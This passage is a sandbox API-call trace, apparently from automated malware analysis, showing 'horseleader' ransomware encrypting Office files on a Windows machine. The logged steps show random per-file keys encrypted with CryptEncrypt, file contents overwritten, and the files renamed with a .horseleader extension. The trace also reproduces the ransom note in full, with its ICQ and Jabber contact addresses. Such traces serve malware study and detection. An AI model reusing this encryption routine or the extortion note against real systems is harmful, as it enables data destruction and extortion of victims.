lpOverlapped=0x0) returned 1 [0245.000] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0245.000] CloseHandle (hObject=0x15c) returned 1 [0245.000] GetProcessHeap () returned 0x780000 [0245.000] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.000] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML.horseleader") returned 118 [0245.000] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml.horseleader")) returned 1 [0245.001] GetProcessHeap () returned 0x780000 [0245.001] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.001] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x1e501370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName="WordMUI.XML", cAlternateFileName="")) returned 0 [0245.001] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0245.002] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\#Decrypt#.txt") returned 108 [0245.002] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0245.146] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0245.146] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0245.147] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0245.148] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0245.148] CloseHandle (hObject=0x1a4) returned 1 [0245.148] GetProcessHeap () returned 0x780000 [0245.148] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0245.148] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e501370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1e501370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e501370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Word.en-us", cAlternateFileName="WORD~1.EN-")) returned 0 [0245.148] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0245.149] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\#Decrypt#.txt") returned 97 [0245.149] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.150] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0245.150] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0245.152] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0245.152] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0245.152] CloseHandle (hObject=0x158) returned 1 [0245.152] GetProcessHeap () returned 0x780000 [0245.152] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0245.152] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5de00200, ftCreationTime.dwHighDateTime=0x1cac9ac, ftLastAccessTime.dwLowDateTime=0x6bc953f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5de00200, ftLastWriteTime.dwHighDateTime=0x1cac9ac, nFileSizeHigh=0x0, nFileSizeLow=0x2560, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OFFREL.DLL", cAlternateFileName="")) returned 1 [0245.152] lstrcmpiW (lpString1="OFFREL.DLL", lpString2="Windows") returned -1 [0245.152] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL") returned 70 [0245.153] StrStrIW (lpFirst="OFFREL.DLL", lpSrch=".horseleader") returned 0x0 [0245.153] lstrcmpW (lpString1="OFFREL.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.153] lstrcmpW (lpString1="OFFREL.DLL", lpString2="_uninstalling_.png") returned 1 [0245.153] lstrlenW (lpString=".testttjffg") returned 11 [0245.153] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL", lpSrch=".testttjffg") returned 0x0 [0245.153] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.153] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.153] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\offrel.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.156] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL") returned 70 [0245.156] StrStrW (lpFirst="OFFREL.DLL", lpSrch=".txt") returned 0x0 [0245.156] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=9568) returned 1 [0245.156] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2560, lpOverlapped=0x0) returned 1 [0245.159] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdaa0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.159] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2560, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2560, lpOverlapped=0x0) returned 1 [0245.159] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.159] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.160] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.160] CloseHandle (hObject=0x158) returned 1 [0245.160] GetProcessHeap () returned 0x780000 [0245.160] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0245.160] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL.horseleader") returned 82 [0245.160] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\offrel.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\offrel.dll.horseleader")) returned 1 [0245.162] GetProcessHeap () returned 0x780000 [0245.162] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0245.162] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5de00200, ftCreationTime.dwHighDateTime=0x1cac9ac, ftLastAccessTime.dwLowDateTime=0x6c2166d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5de00200, ftLastWriteTime.dwHighDateTime=0x1cac9ac, nFileSizeHigh=0x0, nFileSizeLow=0x4d88, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OPHPROXY.DLL", cAlternateFileName="")) returned 1 [0245.162] lstrcmpiW (lpString1="OPHPROXY.DLL", lpString2="Windows") returned -1 [0245.162] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 72 [0245.162] StrStrIW (lpFirst="OPHPROXY.DLL", lpSrch=".horseleader") returned 0x0 [0245.162] lstrcmpW (lpString1="OPHPROXY.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.162] lstrcmpW (lpString1="OPHPROXY.DLL", lpString2="_uninstalling_.png") returned 1 [0245.163] lstrlenW (lpString=".testttjffg") returned 11 [0245.163] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL", lpSrch=".testttjffg") returned 0x0 [0245.163] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.163] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.163] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\ophproxy.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.164] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 72 [0245.164] StrStrW (lpFirst="OPHPROXY.DLL", lpSrch=".txt") returned 0x0 [0245.164] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=19848) returned 1 [0245.164] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4d88, lpOverlapped=0x0) returned 1 [0245.168] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb278, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.169] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4d88, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4d88, lpOverlapped=0x0) returned 1 [0245.169] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.169] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.170] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.170] CloseHandle (hObject=0x158) returned 1 [0245.170] GetProcessHeap () returned 0x780000 [0245.170] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0245.170] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL.horseleader") returned 84 [0245.170] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\ophproxy.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\ophproxy.dll.horseleader")) returned 1 [0245.172] GetProcessHeap () returned 0x780000 [0245.172] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0245.172] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6a43200, ftCreationTime.dwHighDateTime=0x1cb700e, ftLastAccessTime.dwLowDateTime=0xcf47ffa0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xf6a43200, ftLastWriteTime.dwHighDateTime=0x1cb700e, nFileSizeHigh=0x0, nFileSizeLow=0x47a0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OPTINPS.DLL", cAlternateFileName="")) returned 1 [0245.172] lstrcmpiW (lpString1="OPTINPS.DLL", lpString2="Windows") returned -1 [0245.172] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 71 [0245.172] StrStrIW (lpFirst="OPTINPS.DLL", lpSrch=".horseleader") returned 0x0 [0245.172] lstrcmpW (lpString1="OPTINPS.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.172] lstrcmpW (lpString1="OPTINPS.DLL", lpString2="_uninstalling_.png") returned 1 [0245.173] lstrlenW (lpString=".testttjffg") returned 11 [0245.173] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL", lpSrch=".testttjffg") returned 0x0 [0245.173] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.173] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.173] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\optinps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.176] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 71 [0245.177] StrStrW (lpFirst="OPTINPS.DLL", lpSrch=".txt") returned 0x0 [0245.177] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=18336) returned 1 [0245.177] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x47a0, lpOverlapped=0x0) returned 1 [0245.180] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb860, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.180] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x47a0, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x47a0, lpOverlapped=0x0) returned 1 [0245.180] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.180] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.181] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.181] CloseHandle (hObject=0x158) returned 1 [0245.181] GetProcessHeap () returned 0x780000 [0245.181] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0245.181] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL.horseleader") returned 83 [0245.181] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\optinps.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\optinps.dll.horseleader")) returned 1 [0245.184] GetProcessHeap () returned 0x780000 [0245.184] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | 